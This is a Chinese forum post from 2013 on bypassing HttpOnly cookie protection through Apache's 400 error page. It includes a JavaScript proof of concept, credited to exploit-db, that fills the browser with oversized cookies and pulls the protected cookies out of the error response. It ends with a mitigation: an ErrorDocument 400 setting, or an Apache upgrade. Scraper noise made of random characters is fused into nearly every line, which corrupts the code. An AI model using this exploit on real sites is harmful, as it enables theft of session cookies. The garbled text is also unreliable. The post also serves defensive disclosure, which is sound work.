很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。; p1 T( V j3 R6 [
7 ~* p, ?( K+ B9 z
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:' H7 j7 H4 Q9 ~9 p
5 d7 U( g% q ?
( K1 [! m9 Y! e. ~7 q
// http://www.exploit-db.com/exploits/18442/
8 l9 @! U. T- {0 p; g( C: }( Zfunction setCookies (good) {
( v4 b( E+ X& C. @// Construct string for cookie value
1 m4 `& T' \" U) M: m' ?1 }( F. Kvar str = "";2 h7 o# q6 y* ~2 ]; u5 L2 @" j
for (var i=0; i< 819; i++) {
8 Z4 c& K% ^: u( Zstr += "x";
& v- @: J8 N5 }9 w" b, _}
. v" K$ r q$ T5 X! l. L5 ?, _: J// Set cookies
# T6 w1 u3 y) Z, ]& K2 s% Ifor (i = 0; i < 10; i++) {
7 H q! O, V3 M! [7 \) r* H) U. G// Expire evil cookie
/ f: C; b! y$ E! u" W5 b) b3 V6 _* |if (good) {7 s/ b( m4 X4 J- a3 b
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
% s/ h- q1 B. z9 d}6 {; E2 Q: P6 C, C7 s1 i8 e9 |
// Set evil cookie
5 d! [* ^4 |9 g$ X# Z: S; nelse {
( Q2 D2 ^& x- `0 A8 Svar cookie = "xss"+i+"="+str+";path=/";
0 H6 u' K8 O0 |0 w! Y}
0 I) j d& H, W8 [% r+ e! G7 I+ `document.cookie = cookie;/ L8 L/ l# e5 G3 E& I5 h& H4 y0 n
}
' D! P- f" ^. G: b' w" m/ ?3 y}8 Y! K3 k7 G G$ g; X7 M4 {
function makeRequest() {
' r" U, }% o" H! T9 b, VsetCookies();
M. g* V f1 D4 b3 O) k# i% g+ cfunction parseCookies () {
8 C" F) Y% ^! H7 k# Zvar cookie_dict = {};
' {% I& X9 O; A1 ^0 y. x// Only react on 400 status$ e: V3 I" C3 w' l* |* I9 Y
if (xhr.readyState === 4 && xhr.status === 400) {% \& ~9 d& W( E
// Replace newlines and match <pre> content
9 [4 ?! y. q6 {) O1 ?0 D2 u5 Qvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
# U8 l1 Z* C: L% c3 S/ F! kif (content.length) {9 e7 q- k; `( z) u9 y$ f' P
// Remove Cookie: prefix5 L8 r! s/ |8 C5 ^; U7 c: N5 h7 R
content = content[1].replace("Cookie: ", "");
; z0 N# v8 N; v; Hvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);% F5 X8 m @1 z: f7 f
// Add cookies to object- D0 v5 E6 H% v
for (var i=0; i<cookies.length; i++) {
5 C5 ~. V- o8 C- w8 i( Uvar s_c = cookies.split('=',2);" C' w. Z6 ~8 E
cookie_dict[s_c[0]] = s_c[1];
+ K+ _0 a: q7 L, x H5 e9 B9 s1 d/ u}
6 \/ Y* k- b: a9 {}
! n; r r: \) D/ K8 C3 E' Q8 u. o// Unset malicious cookies& s+ `0 h _ m3 B# F
setCookies(true);
; b3 e' Z1 L$ D/ ~alert(JSON.stringify(cookie_dict));
& B" C2 x: C) R: p* {1 W}
+ F+ f( X) q4 h8 S}* d6 G# O8 S% d
// Make XHR request; `! h" f* w3 P$ w ^% ~
var xhr = new XMLHttpRequest();
' f. e8 k! |3 dxhr.onreadystatechange = parseCookies;2 L3 o- Q* o5 K
xhr.open("GET", "/", true);
$ S% F% J$ c4 X; A. k# P+ Q$ bxhr.send(null);! a1 w3 G! ?; C4 D! G& [8 A$ A* y
}% k b4 Z0 o- j Z% A3 ]; c
makeRequest();
( u) K7 v; P- o3 c; I% u. P/ r+ Y9 ~% ?4 v c2 t, f9 d% x
你就能看见华丽丽的400错误包含着cookie信息。2 u" G9 `: w9 D7 N2 B( ^
# N" `2 c- ?9 M! T7 r! B% F
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#& u: D/ _- e. }$ T {0 R: j
8 _/ u' l& q# z+ Q& f
修复方案:
' M7 l" p) w1 m# T. f
7 [- V3 d, {: |4 E! n% d8 F7 e7 XApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
# x: j7 {& z' P8 m8 b2 ~% K( u, `2 s* Z9 J
In the event of a problem or error, Apachecan be configured to do one of four things,, R; }: E# n$ s' z2 A) u& ~
' } B0 f. v$ c& A
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息3 o7 ^: t$ {0 ^+ {$ D: D& Z
2. output acustomized message输出一段信息# {& l2 t6 L" _+ j0 K p$ {9 k+ B
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 4 Y& t( T7 [* s" l/ u* B. J; [
4. redirect to an external URL to handle theproblem/error转向一个外部URL( |1 r0 ^7 ^0 |' ~9 m- E* H2 w2 \
8 R- a, X4 k( d; b& @) j) K, s+ C# g经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容; `4 c2 \' E& @- M$ I
n {$ @; O1 a8 D
Apache配置:2 n! e L! L. s* M( `9 W5 a
* a/ b6 F; H! p6 C4 J; e& y7 mErrorDocument400 " security test"2 j1 C) Q8 _9 v. a$ E( I) n" Z
( y2 ]2 B# d. {( u0 U! p当然,升级apache到最新也可:)。
) E6 b! `7 k4 B' X' J/ T9 ?- b: Z5 ]& C9 Y5 W9 p
参考:http://httpd.apache.org/security/vulnerabilities_22.html( a$ n' A$ n0 ?. K- {
9 `: `! Y1 \/ t6 { J
|
发表于 2013-4-19 19:15:43
收藏
支持
反对